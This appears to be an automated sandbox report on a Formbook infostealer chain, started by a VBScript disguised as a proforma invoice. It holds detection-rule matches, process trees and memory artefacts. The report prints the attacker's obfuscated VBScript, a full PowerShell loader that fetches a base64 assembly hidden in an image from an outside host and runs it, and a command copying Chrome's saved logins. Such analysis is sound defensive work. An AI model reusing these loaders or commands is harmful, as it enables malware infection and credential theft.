            Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: MSBuild.exe PID: 7004, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: colorcpl.exe PID: 4584, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, TaskParameter.cs | Task registration methods: 'CreateNewTaskItemFrom'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, OutOfProcTaskHostNode.cs | Task registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, TaskLoader.cs | Task registration methods: 'CreateTask'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, RegisteredTaskObjectCacheBase.cs | Task registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, CommunicationsUtilities.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: *.sln
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MSBuild MyApp.csproj /t:Clean
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /ignoreprojectextensions:.sln
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
            Source: classification engine | Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@17/11@8/6
            Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K2No9[1].txt
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuysriqt.cbw.ps1
            Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
            Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: colorcpl.exe, 00000008.00000003.2008152308.0000000003390000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2931288836.0000000003390000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1895059088.00000000026E5000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1894768395.000000000287A000.00000004.00000020.00020000.00000000.sdmp, DB1.9.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '...
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
            Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, scrrun.dll, msxml3.dll, wininet.dll, iertutil.dll, urlmon.dll, srvcli.dll, netutils.dll, sspicli.dll, windows.storage.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, dpapi.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, mpr.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
            Source: C:\Windows\explorer.exe | Section loaded: mfsrcsnk.dll
            Source: C:\Windows\SysWOW64\colorcpl.exe | Section loaded: colorui.dll, mscms.dll, userenv.dll, coloradapterclient.dll, wininet.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, winhttp.dll, wkscli.dll, netutils.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, windowscodecs.dll
            Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\SysWOW64\colorcpl.exe | File written: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.ini
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\colorcpl.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: Binary string: firefox.pdbP source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") ovarista = ("$(@(?(@?@?dig@?@? = '") & tangendo & "'" ovarista = ovarista & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" ovarista = ovarista & "[??}@*y??}@*" ovarista = ovarista & "t?*(?" ovarista = ovarista & "m.(@(?(@?@?" ovarista = ovarista & "nv?*(?r" ovarista = ovarista & "t]:" ovarista = ovarista & ":Fr@?@?" ovarista = ovarista & "mba??}@*" ovarista = ovarista & "?*(?64??}@*tring( $(@(?(" ovarista = ovarista & "@?@?d" ovarista = ovarista & "ig@?@?.r?*(?" ovarista = ovarista & "@%*:&la" ovarista = ovarista & "(@(?(?*(?('" ovarista = ovarista & "DgTr?*(?" ovarista = ovarista & "','" ovarista = ovarista & "A" ovarista = ovarista & "') ))" ovarista = ovarista & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" ovarista = Replace(ovarista,"@%*:&","p") ovarista = Replace(ovarista,"(@(?(","c") ovarista = Replace(ovarista,"?*(?","e") ovarista = Replace(ovarista,"@?@?","o") ovarista = Replace(ovarista,"??}@*","s") trapalhona1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " trapalhona1 = Replace(trapalhona1,"(@(?(","c") trapalhona1 = Replace(trapalhona1,"??}@*","s") trapalhona1 = Replace(trapalhona1,"@?@?","o") trapalhona1 = Replace(trapalhona1,"@%*:&","p") trapalhona = trapalhona1 & """" & ovarista & """" Cama.Run trapalhona, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/K2No9", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $codigo = '...
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '...
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B8000AD pushad ; iretd 1_2_00007FFD9B8000C1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041E87D push ds; retf 5_2_0041E880
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041E83C push 2E339416h; ret 5_2_0041E83A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041698A push esp; ret 5_2_0041698B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041C238 push esp; retf 5_2_0041C23D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00416C44 push 7B91E71Ah; retf 5_2_00416C54
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D4B5 push eax; ret 5_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041ED66 pushad ; retf 5_2_0041ED67
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D56C push eax; ret 5_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D502 push eax; ret 5_2_0041D508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041D50B push eax; ret 5_2_0041D572
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_00405E02 push esp; ret 5_2_00405E04
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041EEDF push FFFFFFD3h; iretd 5_2_0041EEE1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_0041E770 push 2E339416h; ret 5_2_0041E83A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 5_2_013809AD push ecx; mov dword ptr [esp], ecx 5_2_013809B6
            Source: C:\Windows\explorer.exe Code function: 6_2_0B414B02 push esp; retn 0000h 6_2_0B414B03
            Source: C:\Windows\explorer.exe Code function: 6_2_0B414B1E push esp; retn 0000h 6_2_0B414B1F
            Source: C:\Windows\explorer.exe Code function: 6_2_0B4149B5 push esp; retn 0000h 6_2_0B414AE7
            Source: C:\Windows\explorer.exe Code function: 6_2_0E8ECB02 push esp; retn 0000h 6_2_0E8ECB03
            Source: C:\Windows\explorer.exe Code function: 6_2_0E8ECB1E push esp; retn 0000h 6_2_0E8ECB1F
            Source: C:\Windows\explorer.exe Code function: 6_2_0E8EC9B5 push esp; retn 0000h 6_2_0E8ECAE7
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_000E1A6D push ecx; ret 8_2_000E1A80
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E27FA pushad ; ret 8_2_050E27F9
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050EB008 push es; iretd 8_2_050EB009
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E1368 push eax; iretd 8_2_050E1369
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E225F pushad ; ret 8_2_050E27F9
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E9939 push es; iretd 8_2_050E9940
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_051109AD push ecx; mov dword ptr [esp], ecx 8_2_051109B6
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_050E283D push eax; iretd 8_2_050E2858
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4C238 push esp; retf 8_2_02F4C23D
            Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 8_2_02F4E87D push ds; retf 8_2_02F4E880

            Hooking and other Techniques for Hiding and Protection

            Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEA
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 2F39904 second address: 2F3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
